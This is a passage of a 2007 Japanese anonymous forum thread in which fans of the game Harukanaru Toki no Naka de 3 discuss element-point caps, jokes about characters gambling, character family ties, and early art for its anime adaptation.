確かに水属性からしたら土属性は苦手属性で、攻撃は結構くらうけど、
水属性の攻撃も全く相克関係無い属性よりは
土属性に対して攻撃する方が効くってのは見た記憶がある

144 :名無しって呼んでいいか?:2007/10/07(日) 01:25:26 ID:???
>>143
文意の読み違いが主題の時に
そういうややこしい事を横から言わない

と横入りしてみる

145 :名無しって呼んでいいか?:2007/10/07(日) 02:28:50 ID:???
ちょっと質問です。
五行の力って上限いくつまで溜めれるのかな999?

146 :名無しって呼んでいいか?:2007/10/07(日) 02:36:19 ID:???
うん、そうだよ
だから900超えたあたりで使うようにしてた

満遍なく増やすのは難しかったな、なんであんなに金だけ溜まるんだか…
自分の場合だが

147 :名無しって呼んでいいか?:2007/10/07(日) 02:40:35 ID:???
>>146
ありがトン。自分は木ばっか溜まってしょうがないw慢性水不足…
4週目突入。仲間全員最強にするためにガンガります。

148 :名無しって呼んでいいか?:2007/10/07(日) 02:57:10 ID:???
スキル?上げるのに結局満遍なく必要なんだよね
もっと偏ってもよかったと思うー

149 :名無しって呼んでいいか?:2007/10/07(日) 04:21:32 ID:???
スキル上げはもっと属性ごとに特徴が欲しかった。五行の意味がないじゃんよ…

150 :名無しって呼んでいいか?:2007/10/07(日) 09:23:46 ID:???
自分いちいち属性ごとに集めるの面倒なんで最低限必要なスキルしか上げてない
要するにこれはケチなんだなww

151 :名無しって呼んでいいか?:2007/10/07(日) 09:24:51 ID:???
キャラごとの能力パラメータのバランス自体無茶苦茶だもんねぇ…w
いくら龍神の加護とはいえ女子高生の能力限界超え杉ww

152 :名無しって呼んでいいか?:2007/10/07(日) 10:09:53 ID:???
五行の力ってすごいな
余った分何かに使えないかな

153 :名無しって呼んでいいか?:2007/10/07(日) 11:40:29 ID:???
>>134
銀が非童貞なのに重衡がヤリチンなのにワラタw

154 :名無しって呼んでいいか?:2007/10/07(日) 11:45:46 ID:???
18禁ネタはやめれ…
せめてキスの上手さとかで

155 :名無しって呼んでいいか?:2007/10/07(日) 12:15:56 ID:???
不足してる五行に限って
敵が見当たらないことが何回かあったな

156 :名無しって呼んでいいか?:2007/10/07(日) 12:58:51 ID:???
童貞非童貞ネタが面白いとは思わないけど
18禁ネタではないとおもうw
キスのうまさとかの方がよっぽど生々しくてきもいわ

157 :名無しって呼んでいいか?:2007/10/07(日) 13:00:21 ID:???
>>155
あるあるwww
有利な八葉がちょうどいなかったりな

158 :名無しって呼んでいいか?:2007/10/07(日) 13:06:24 ID:???
>>152
次の危機に備えて温存、とかできたらそうそう神子も召喚されずに済み
なかなか4は発売されない…という罠。

159 :名無しって呼んでいいか?:2007/10/07(日) 13:12:29 ID:???
どうせ十六夜オールクリアする頃には五行カンストしてんだから
白龍に貯金で持たしてやればいい

それを使い果たしてから4神子召還て事にすると
100年刻みすっ飛ばして維新あたりまで一気に来れるだろか

160 :名無しって呼んでいいか?:2007/10/07(日) 13:23:49 ID:???
自分は主に水と火が不足しがちだったなー
十六夜の時点では神子も朔も白龍も八葉もMAX状態、五行の力も999だったから、
知盛や銀が入ったら即育ててた

それでもすぐに999になるから、白龍に還元できんもんかとは思ったw

161 :名無しって呼んでいいか?:2007/10/07(日) 14:41:01 ID:???
キスの上手さ
したことがない→九郎、先生、白龍、泰衡
普通→譲、景時、敦盛
上手い→将臣
プロ→弁慶、ヒノエ、銀
ネ申→知盛


162 :名無しって呼んでいいか?:2007/10/07(日) 15:15:53 ID:???
五行の上限999にしばらく気付かなかった

163 :名無しって呼んでいいか?:2007/10/07(日) 15:21:14 ID:???
確か、本来元々は星の一族が請わないといけなかった気がするんだが
>>神子召喚
3も一応菫姫が呼んでる…んだよね、確か
勢い余って逆に行っちゃったけど

つー訳で星の一族に余った力は渡しとこう

164 :名無しって呼んでいいか?:2007/10/07(日) 15:36:14 ID:???
京に残ってる人にあげればいいんだろうか
それとも有川兄弟のほうだろうか

165 :名無しって呼んでいいか?:2007/10/07(日) 17:34:45 ID:???
>>163
とんでもない勢いの余り方だよな

166 :名無しって呼んでいいか?:2007/10/07(日) 17:35:07 ID:???
あまった五行はお金に換金して
買い物したり賭場に行けたりしたらよかったのに

167 :名無しって呼んでいいか?:2007/10/07(日) 18:05:21 ID:???
あの世界で神子個人が買い物って何を…



柿か

168 :名無しって呼んでいいか?:2007/10/07(日) 18:21:31 ID:???
おやつは400円まで、柿はおやつに含みません
>>165
実は行ってみたいと思ってたのかもな

169 :名無しって呼んでいいか?:2007/10/08(月) 01:20:31 ID:???
愛と誠いい曲

170 :名無しって呼んでいいか?:2007/10/08(月) 06:04:48 ID:???
>>161
リズ先生→マスクがあるからキスできない だろ

171 :名無しって呼んでいいか?:2007/10/08(月) 08:47:49 ID:???
マスク越しというのも新境地で意外といいかも試練

172 :名無しって呼んでいいか?:2007/10/08(月) 12:31:55 ID:???
>>171
蒸れます。

173 :名無しって呼んでいいか?:2007/10/08(月) 14:36:32 ID:???
>>166
八葉を育てずひたすら賭場に入り浸り
しまいには九郎の刀を質に入れてまで賭け事にのめりこむ神子が
誕生しそうな予感

174 :名無しって呼んでいいか?:2007/10/08(月) 17:02:11 ID:???
敦盛「神子、私の笛を知らないか?」

175 :名無しって呼んでいいか?:2007/10/08(月) 17:14:34 ID:???
白龍大「神子、私の"べると"何に使うの?」

176 :名無しって呼んでいいか?:2007/10/08(月) 17:29:30 ID:???
金には困らないだろう
財源としてヒノエがいるし

そして朱雀コンビと将臣、朔なんかは賭場に出禁くらいそうなほど
稼ぐイマゲ

177 :名無しって呼んでいいか?:2007/10/08(月) 17:30:16 ID:???
先生「何故この運命を選んだ…!」

178 :名無しって呼んでいいか?:2007/10/08(月) 17:31:40 ID:???
>>176
朔は天然だけど、他3人はフツーにイカサマしてそうw


179 :名無しって呼んでいいか?:2007/10/09(火) 01:34:10 ID:???
>>178
特に朱雀2人は絶対イカサマしてそうだな
反対に九郎はすってんてんになりそう

180 :名無しって呼んでいいか?:2007/10/09(火) 05:36:34 ID:???
九朗はお約束だなw
景時も手先が器用だからいける気がする

181 :名無しって呼んでいいか?:2007/10/09(火) 07:30:02 ID:???
譲は拒否りそうだが
神子がやれと言えば星の一族の能力駆使しておk

182 :名無しって呼んでいいか?:2007/10/09(火) 07:52:22 ID:???
リズ先生は時空を跳んでやり直します

183 :名無しって呼んでいいか?:2007/10/09(火) 07:53:28 ID:???
玄武ペアは少しずつ手堅く稼ぎそうだ

184 :名無しって呼んでいいか?:2007/10/09(火) 08:08:32 ID:???
弁慶は胴元を怒らす手前でやめるのが上手そうだ
そしてねちねちと末永くカモって行くんだな

185 :名無しって呼んでいいか?:2007/10/09(火) 11:09:49 ID:???
胴元が可哀想だw

186 :名無しって呼んでいいか?:2007/10/09(火) 13:27:47 ID:???
>>161
ネ申→後白河法皇だろw

187 :名無しって呼んでいいか?:2007/10/09(火) 14:40:55 ID:???
>前2作では同じ四神の八葉でも性格・立場の違いで衝突する場面が多かったが、
>今作では八葉同士の対同じ四神の八葉ほど気が合うようである。

wikiのこの部分で吹いた
朱雀組からは激しく反発されそうだなw

188 :名無しって呼んでいいか?:2007/10/09(火) 18:12:41 ID:???
>>187
特にたんぞーなwww

189 :名無しって呼んでいいか?:2007/10/09(火) 18:26:05 ID:???
3八葉は気が合うというよりは、いい意味でお互いを意識しなくていい間柄だと思うな
まともな関係だとは思うが、少し寂しい自分はマゾだろうか

190 :名無しって呼んでいいか?:2007/10/09(火) 18:39:26 ID:???
自分は毎度の天地がらみのごたごたイベントが好きだったので
そういう流れがなかったのは寂しいし残念だったよ。

191 :名無しって呼んでいいか?:2007/10/09(火) 18:41:10 ID:???
世の中そのものがごたごたしてて
天地だけで揉めてる場合じゃなかったっつーか

192 :名無しって呼んでいいか?:2007/10/09(火) 19:00:30 ID:???
3は基本的に最初から皆仲良しだもんな
自分はそれが好きだが

それにしても八葉が揃ってる期間がえらく短いなと、再プレイしてつくづく思う

193 :名無しって呼んでいいか?:2007/10/09(火) 19:18:26 ID:???
>>191
1,2の連中なら、この状況でも絶対に揉めてくれる

いや、みんな違ってみんないいんだけどね

194 :名無しって呼んでいいか?:2007/10/09(火) 19:26:52 ID:???
>>192
最初仲良し、でも途中から離脱したり敵に回ったりって感じ

195 :名無しって呼んでいいか?:2007/10/09(火) 19:30:05 ID:???
お互いこういうご時勢だからって割り切った感じはあるな
昨日の友が今日の敵でもそんなには驚かない、みたいな

196 :名無しって呼んでいいか?:2007/10/09(火) 19:34:16 ID:???
もうちっと驚いてもいいんじゃないかと個人的には思ったw

197 :名無しって呼んでいいか?:2007/10/09(火) 19:59:05 ID:???
>>196
うすうす気付いてるが、考えないようにした性でえらいところで
出会って戦うのはちょっとな…
何で戦わないといけないんだ!と真剣に憤った

198 :名無しって呼んでいいか?:2007/10/09(火) 20:01:15 ID:???
そんな中でも仲の悪い朱雀組w

三親等で一番近い関係なのになあ
あの叔父甥の関係は好きだが

199 :名無しって呼んでいいか?:2007/10/09(火) 20:18:57 ID:???
身近だからこそ遠慮がないだけなんじゃないの?<仲悪い
3の八葉は仲がいいってより、それぞれ距離感がある分
遠慮というか配慮しあって上手くやってる感じ

200 :名無しって呼んでいいか?:2007/10/09(火) 20:19:22 ID:???
結局最後の最後まで
九郎はヒノエと従兄弟同士だということを知らされなかったのかな

201 :名無しって呼んでいいか?:2007/10/09(火) 20:24:10 ID:???
従兄弟とはいえあのタラシだらけのなかに九郎みたいなのがいると新鮮に思う

202 :名無しって呼んでいいか?:2007/10/09(火) 20:25:36 ID:???
そんなにタラシ多かったかなー

203 :名無しって呼んでいいか?:2007/10/09(火) 20:28:04 ID:???
つか、ヒノエが頭領だとばれた後も
九郎1人だけ知らされてなかったし

きっとヒノエは一生従兄弟だと黙ってるつもりなんだろ

204 :名無しって呼んでいいか?:2007/10/09(火) 20:29:41 ID:???
九郎はモンゴルに行くのが一番幸せな気がする

205 :名無しって呼んでいいか?:2007/10/09(火) 20:32:40 ID:???
>>202
実際の血縁を挙げていくとヒノエだけだね<タラシ
弁慶は叔母の夫の弟で、縁戚だけど血縁はないし

>>203
その内気づくんじゃない?
ヒノエの母が自分の父親の異母姉妹っていうのは、何かの
拍子で知りそうだ
それよりも、自分の異父妹がティンクの娘で平家の姫という方が
堪えそうだな、九郎

206 :名無しって呼んでいいか?:2007/10/09(火) 20:33:37 ID:???
>>204
九郎に限らず皆モンゴルか現代行った方がいいよ…

207 :名無しって呼んでいいか?:2007/10/09(火) 20:34:23 ID:???
重要なことを知らされない星の下に生まれたのが九郎です

208 :名無しって呼んでいいか?:2007/10/09(火) 20:35:50 ID:???
…って書いてたら、銀髪兄弟や重盛とは廊の御方を挟んで同じ「兄」という立場、
父の仇のティンクは妹の父という凄まじい環境なんだな、九郎…

209 :名無しって呼んでいいか?:2007/10/09(火) 20:38:05 ID:???
九郎にとってきょうだいは髭だけだから
後はどうでもいい

210 :名無しって呼んでいいか?:2007/10/09(火) 20:38:42 ID:???
九郎の異父妹って遙か世界では存在してるの?

211 :名無しって呼んでいいか?:2007/10/09(火) 20:41:30 ID:???
少なくともメモブには載ってなかった
つーか、九郎の兄なら髭上以外にも普通に何人か生きてる筈だが
その辺もあの髭上ならやってしまってそうだな

212 :名無しって呼んでいいか?:2007/10/09(火) 20:42:23 ID:???
>>210
紅玉がネタにつまったら存在してたことになるかも
でも今のところ、九郎と髭上以外に源氏が存在するかも怪しい世界

213 :名無しって呼んでいいか?:2007/10/09(火) 20:45:35 ID:???
下手すると黒神子枠だった可能性もあるよね
そうなると、二代続けて平氏か…いや朔もそうだけど

214 :名無しって呼んでいいか?:2007/10/09(火) 21:01:16 ID:???
ティンクが九郎に「常盤の子か……」と言ってたので、常盤とティンクには何らかの
関係があったんだろうなーとは思う

ただ徳子を既に死者にしてたりするから、紅玉設定はどこまでのものなのか
わからないけど

215 :名無しって呼んでいいか?:2007/10/09(火) 21:26:11 ID:???
>>212
本当に源氏メンバーは存在感じなかったw
平家はあんなに賑やかなのに

216 :名無しって呼んでいいか?:2007/10/09(火) 21:39:40 ID:???
あの世界の源平と皇室の家系図見てみたい

217 :名無しって呼んでいいか?:2007/10/09(火) 21:41:33 ID:???
恐ろしいことになっていそうだな

218 :名無しって呼んでいいか?:2007/10/09(火) 21:55:05 ID:???
>>203
会った時点でバレてなかったのをいい事に政治的判断で隠してただけで
他に隠したい理由があるんじゃなく、あえて改めて言う必要がないだけの気が。
九郎だって知りようがないわけじゃないだろうし。

>>205
熊野側から見れば十分タラシだらけそう。

219 :名無しって呼んでいいか?:2007/10/09(火) 22:12:27 ID:???
遙かは2のPC版をちょろっとしかやったことないふつつか者ですが
無性に3がやりたくなって、今日3と十六夜記を注文してきた。
無茶苦茶楽しみだYO!

Wikiとかまとめサイトとかあんまりネタバレしない程度には見てるんだが、
何かああしとくとストーリー的に良かったとか、神子弱っちいうちにこれ見といた方がいい、とか
オススメあったら教えて下さらんか。
攻略は最初に将臣や九郎、合間にヒノエ、最後に師匠、がオススメと有ったんで
とりあえず四神天地の順に突撃する予定。

220 :名無しって呼んでいいか?:2007/10/09(火) 22:36:43 ID:???
3はシステム面が快適だから、気にせず思うままにいきなさい。

221 :名無しって呼んでいいか?:2007/10/09(火) 22:45:42 ID:???
>>219
神子が強ダメージ受けた時の台詞は
弱くないと見るのが難しいとオモ

222 :名無しって呼んでいいか?:2007/10/09(火) 23:46:02 ID:???
うぬぬ。そういえば最速で神子最強にしてしまったから聞いたことないわw
クリティカルのお褒めの言葉は数知れないが…
ちょっとよわよわでフルボッコされてこよっとw


223 :名無しって呼んでいいか?:2007/10/09(火) 23:47:27 ID:???
強ダメージ受けたときの台詞は萌えるのが多いので
耐性あまりつけないようにしているw

224 :名無しって呼んでいいか?:2007/10/10(水) 03:25:25 ID:???
>>219
・1周目は序章だから攻略とか考えずプレイすると吉
・まとめてフラグ立てておかないと後で発狂しそうになるよ!

225 :名無しって呼んでいいか?:2007/10/10(水) 09:12:20 ID:???
アニメ版の絵が載ってる
ttp://www.shufu.co.jp/topics/pash/

226 :名無しって呼んでいいか?:2007/10/10(水) 11:32:47 ID:???
>>225
弁慶が悪役っぽいな

227 :名無しって呼んでいいか?:2007/10/10(水) 11:53:10 ID:???
>>225
そんなにひどい絵じゃないね

228 :名無しって呼んでいいか?:2007/10/10(水) 12:12:33 ID:???
>>225
フリルじゃなくてよかった

229 :名無しって呼んでいいか?:2007/10/10(水) 13:29:12 ID:???
今までアニメの見たことないんだけど1とかは相手は固定されたり
誰ルートとかある?オリジナル?

230 :名無しって呼んでいいか?:2007/10/10(水) 13:49:51 ID:???
>>223
1回完全コンプして、メモカ変えて2回目を始める時に同じことをしたが、
先生ルートでどうしても耐性上げなきゃならなくなって、先生を最後に
したけど、皆が神子を庇うもんだから痛恨の一撃時の台詞を聞くのは
挫折した…

庇うなぁぁぁぁぁぁぁっ!と何度思ったことかw

231 :名無しって呼んでいいか?:2007/10/10(水) 14:23:14 ID:???
フリルじゃないのか…(´・ω・`)蟹じゃないのは素直に嬉しい
>>229
八葉抄アニメはメインシナリオが一本道なので特に相手固定はなかった
ラストは誰だかわからない相手に手を伸ばしてDVDでマルチED

232 :名無しって呼んでいいか?:2007/10/10(水) 14:57:46 ID:???
>>230
神子気絶の台詞なら
神子と誰かで2人円陣にしたらいいんじゃ?

233 :名無しって呼んでいいか?:2007/10/10(水) 15:29:45 ID:???
>>229
LaLaでの書かれ方だと将臣ルートでほぼ決定

234 :名無しって呼んでいいか?:2007/10/10(水) 15:43:22 ID:???
>>231
しかし動くと蟹になるのですよ!

235 :名無しって呼んでいいか?:2007/10/10(水) 15:46:27 ID:???
>>231
フリルがよかったのかよw

236 :名無しって呼んでいいか?:2007/10/10(水) 16:44:35 ID:???
>>231-233
d!まあルート敵には将臣か九郎か

237 :名無しって呼んでいいか?:2007/10/10(水) 17:15:22 ID:???
もしや他のアニメ誌にも紅の月の記事が載ってるのかね?
アニメ絵のために雑誌買い漁りそうw

238 :名無しって呼んでいいか?:2007/10/10(水) 17:48:53 ID:???
>>237
今日発売のアニメディアとアニメージュには無かった

239 :名無しって呼んでいいか?:2007/10/10(水) 17:56:51 ID:???
>>225
思ったよりまともそうだけど相変わらず似せる努力は放棄してる感じ

240 :名無しって呼んでいいか?:2007/10/10(水) 18:10:21 ID:???
pash買ってきた
青龍は割といい感じだと思ったけど、ヒノエは竹宮系の美少年になっちゃったね

241 :名無しって呼んでいいか?:2007/10/10(水) 18:57:04 ID:???
219です
神子たちありがとう!
とりあえず、思うままにフルボッコにされつつ旗立てるよ!
早く届かないかなウズウズ

242 :名無しって呼んでいいか?:2007/10/10(水) 19:08:02 ID:???
PASH見てきたけど朱雀はちょっと違和感があるなぁ


243 :名無しって呼んでいいか?:2007/10/10(水) 22:07:28 ID:???
>>225
ヒノエ別人じゃね?
髪が短いのと色がオレンジっぽいせいか?

244 :名無しって呼んでいいか?:2007/10/10(水) 22:09:19 ID:???
うーん、ヒノエ別人に見える…これから買いに行ってくるw

245 :244:2007/10/10(水) 22:28:35 ID:???
ほい
ttp://www.imgup.org/iup481386.jpg.html

246 :244:2007/10/10(水) 22:32:05 ID:???
連投ごめん

原画:森田奈苗
作画監修:つなきあき

247 :名無しって呼んでいいか?:2007/10/10(水) 22:40:42 ID:i7iTk+Y8
↑ 245 見えないのは 俺だけ?


248 :名無しって呼んでいいか?:2007/10/10(水) 22:57:34 ID:???
sageれ、容量でかいから携帯では見れないかも
自分は見えた、トンクス
口小さくて顎尖ってるね
もっさり感が低いのは好感

249 :名無しって呼んでいいか?:2007/10/10(水) 22:58:16 ID:???
あんまり情報なかた

250 :名無しって呼んでいいか?:2007/10/10(水) 23:01:47 ID:???
見えたよ、>>244d
字見えないけどちょっとした紹介文くらい?

弁慶と将臣はいいのに、なんか九朗の顎とヒノエの悪人面が気になる
でもゲームにくらべれば格段にいいね

251 :名無しって呼んでいいか?:2007/10/10(水) 23:02:21 ID:???
あらすじを見た印象では一周目が描かれるような感じだな
弁慶は将臣の正体を怪しんでいると書かれていた

252 :名無しって呼んでいいか?:2007/10/10(水) 23:35:27 ID:???
まぁ怪しまなかったら阿呆だわな

253 :名無しって呼んでいいか?:2007/10/10(水) 23:35:33 ID:???
ヒノエの顔がちょっと子供っぽい印象だな
それにしても弁慶は……wwwwwwww

254 :名無しって呼んでいいか?:2007/10/10(水) 23:58:33 ID:???
白虎と玄武も、勿論どこかに載るよね?

景時は普段着のがいいのに。

255 :名無しって呼んでいいか?:2007/10/11(木) 00:02:05 ID:???
一週目なのはいいんだけどあの白龍の鱗取るとこもうちょいマシになるんだろうかw

256 :名無しって呼んでいいか?:2007/10/11(木) 00:04:34 ID:???
>>255
「マシ」とは、べりべりっ「ひぎゃあぁぁーーーーーっ!」てな感じですか?

257 :名無しって呼んでいいか?:2007/10/11(木) 00:09:38 ID:???
シールじゃなきゃなんでもおk


258 :名無しって呼んでいいか?:2007/10/11(木) 00:15:28 ID:???
>>252
九郎のことかーーーーーーーー!!

259 :名無しって呼んでいいか?:2007/10/11(木) 00:18:54 ID:???
ぺろんよりべろん
ぺり、よりべりっ
寧ろゴトッて感じで頼むぜ>逆鱗

260 :名無しって呼んでいいか?:2007/10/11(木) 00:23:08 ID:???
関係ないんだけどパールガーデンのピアはもうちょっと痛そうに鱗剥いでたもんよ…

261 :名無しって呼んでいいか?:2007/10/11(木) 00:23:20 ID:???
最低ラインが余りに低いせいか、割と絵にはポジティブだなみんな

問題は話とキャラなんだよな

262 :名無しって呼んでいいか?:2007/10/11(木) 00:34:51 ID:???
とりあえず心の準備ラインよりは上だった

263 :名無しって呼んでいいか?:2007/10/11(木) 00:51:41 ID:???
監督の日記みてるとハラハラする。
スタッフがんばれ。超がんばれ。

264 :名無しって呼んでいいか?:2007/10/11(木) 00:56:47 ID:???
>>261
最低ライン…もしかして肥は最初からこれが狙いだったんじゃ…―!?

265 :名無しって呼んでいいか?:2007/10/11(木) 00:57:57 ID:???
絵は動くとまた違うからなー
1枚絵は時間かけて描かれるけど、動画の原画は……

266 :名無しって呼んでいいか?:2007/10/11(木) 00:59:29 ID:???
>>244
dです
自分はこんなかんじなら全然大丈夫だ。特に左二人は寧ろ好みなくらいだ
せめて絵はこの位のクオリティを保ってくれるといいな

267 :名無しって呼んでいいか?:2007/10/11(木) 01:03:04 ID:???
>>264
壮大すぎる陰謀だw

しかし本当に平家好きだね、紅玉は

268 :名無しって呼んでいいか?:2007/10/11(木) 01:54:39 ID:???
一時間ならDVD1本で販売するかなあ

269 :名無しって呼んでいいか?:2007/10/11(木) 01:59:59 ID:???
豪華版、通常版、兄友版の3種類発売
水野ポスカ、つなきポスカ、八葉の語りCDがそれぞれついてきます

とかやるよな絶対<DVD

270 :名無しって呼んでいいか?:2007/10/11(木) 03:10:37 ID:???
今更ながら遙か3初プレイなんですが、1も2もやらずにチャレンジって無謀ですか?

271 :名無しって呼んでいいか?:2007/10/11(木) 03:20:19 ID:???
1・2とはほぼ別物だから平気じゃない?

272 :名無しって呼んでいいか?:2007/10/11(木) 08:14:56 ID:???
全然困らないと思う

273 :名無しって呼んでいいか?:2007/10/11(木) 09:02:07 ID:???
遙か3しかやったことないけど大丈夫だったよ

274 :名無しって呼んでいいか?:2007/10/11(木) 10:25:34 ID:???
いい加減テンプレ入りだな、それは
全関連スレに入れてもいいくらいだ

*シリーズは単体でプレイ可能、但し3十六夜は追加ディスクなので本編必須
とか

275 :名無しって呼んでいいか?:2007/10/11(木) 10:25:37 ID:???
>>269
つなきポスカの為には買わんぞ

しかし残り2つの為には複数買いするorz

276 :名無しって呼んでいいか?:2007/10/11(木) 11:45:30 ID:???
付録CDも天の四神、地の四神や各四神ごと、みたいな

277 :名無しって呼んでいいか?:2007/10/11(木) 11:47:48 ID:???
>>254
次号も載るらしい
あらすじ読んだけど1周目途中?

278 :名無しって呼んでいいか?:2007/10/11(木) 13:18:41 ID:???
1周目メインか

となると様々な謎が謎のままだな
評判よかったらOVAでシリーズ化とかを狙ってんのか

279 :名無しって呼んでいいか?:2007/10/11(木) 13:22:38 ID:???
>>278
明らかに最初から狙ってると思うんだが

280 :名無しって呼んでいいか?:2007/10/11(木) 14:28:34 ID:???
様々なアンチをものともせず
「皆様の声により、地上波放送決定!!」


だとオモ(´・ω・`)

281 :名無しって呼んでいいか?:2007/10/11(木) 15:06:52 ID:???
せめてOVAで…

282 :名無しって呼んでいいか?:2007/10/11(木) 17:02:56 ID:E/tEGDj7
にしても何でそんなにゆめ太にこだわるんだろ
KOEIと何の關係があるのかな…
世界最大のミステリ―中一つだな

283 :名無しって呼んでいいか?:2007/10/11(木) 18:48:59 ID:???
単に安く請け負ってくれるんじゃないの?
もっと気合入れればまた新たな層が得られるだろうに
源平合戦で話も結構面白いんだし、やる人がやれば…

284 :名無しって呼んでいいか?:2007/10/11(木) 19:15:28 ID:???
今7章なんだけど
錬金術レベルが最高になった途端にシャドウストーカーに挑んだら全滅した
レベルはエッジとイリスが30、ネルが29
レベルが足りなかったのか、自分がへたくそなだけでやりようによっては楽勝のレベルなのか
ここの人達はレベルどのぐらいで倒してます?

285 :284:2007/10/11(木) 19:16:12 ID:???
ごめんものすごい誤爆した 大変申し訳ない

286 :名無しって呼んでいいか?:2007/10/11(木) 19:19:53 ID:???


287 :名無しって呼んでいいか?:2007/10/11(木) 19:22:07 ID:???
ドンマイw
錬金術とか景時は使えそうだな。それこそ何の話になるかわからんけど。
いっそ遙か3でそういうアクションゲーム出して欲しい。

288 :名無しって呼んでいいか?:2007/10/11(木) 19:25:44 ID:???
どうせ異世界なんだしもうなんでもアリで錬金術でも魔術でも呪術でも気孔でもww

289 :名無しって呼んでいいか?:2007/10/11(木) 19:35:44 ID:???
アニメは遙か2OVAレベルでいいよもう
戦闘場面が少しだけなら何とかなるだろう
装飾品が多いががんばれ

290 :名無しって呼んでいいか?:2007/10/11(木) 20:11:39 ID:???
2OVAと聞いて
望美が薬を例のタブレットケースカバーをつけたケースに入れて携帯してるのを想像した
他にも小箱、ティーカップ等グッズが宣伝を兼ねて随所随所に…

291 :名無しって呼んでいいか?:2007/10/11(木) 20:22:43 ID:???
アニメでヒノエが神子にあげるプレゼントは
ネオロマジュエリー

292 :名無しって呼んでいいか?:2007/10/11(木) 20:57:49 ID:???
なぜなら彼女もまた特別な存在だからです

293 :名無しって呼んでいいか?:2007/10/11(木) 23:53:04 ID:???
というCMがキッズステーション放送時には
15分おきに入ります

294 :名無しって呼んでいいか?:2007/10/12(金) 10:53:37 ID:???
昨日のボクシング、カメダが弁慶の格好してたのは聞いてたんだが、
まさかそれに田辺市からも協力があったとは…

田辺と弁慶の関係をPRしたかったらしいが、よりにもよってという選択
悪い方面にPRしてどうすんだ
その辺、紅玉と話し合ってみてほしいorz


295 :名無しって呼んでいいか?:2007/10/12(金) 11:17:20 ID:???
>>294
これ?
ttp://www.kishu-benkei.com/image/benkei/kakudai/020kameda.jpg

296 :名無しって呼んでいいか?:2007/10/12(金) 12:37:03 ID:???
なんで紅玉とw
それはそれで悪い方向へ行きそうだ

アニメ1周目メインとはいえ時間内に収まるのか心配
早口アニメは嫌だよ

297 :名無しって呼んでいいか?:2007/10/12(金) 12:46:29 ID:???
じゃ早回しアニメ

298 :名無しって呼んでいいか?:2007/10/12(金) 13:22:50 ID:???
カニメの部分だけ全部繋げれば…

299 :名無しって呼んでいいか?:2007/10/12(金) 15:08:32 ID:???
拷問か嫌がらせか

61 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)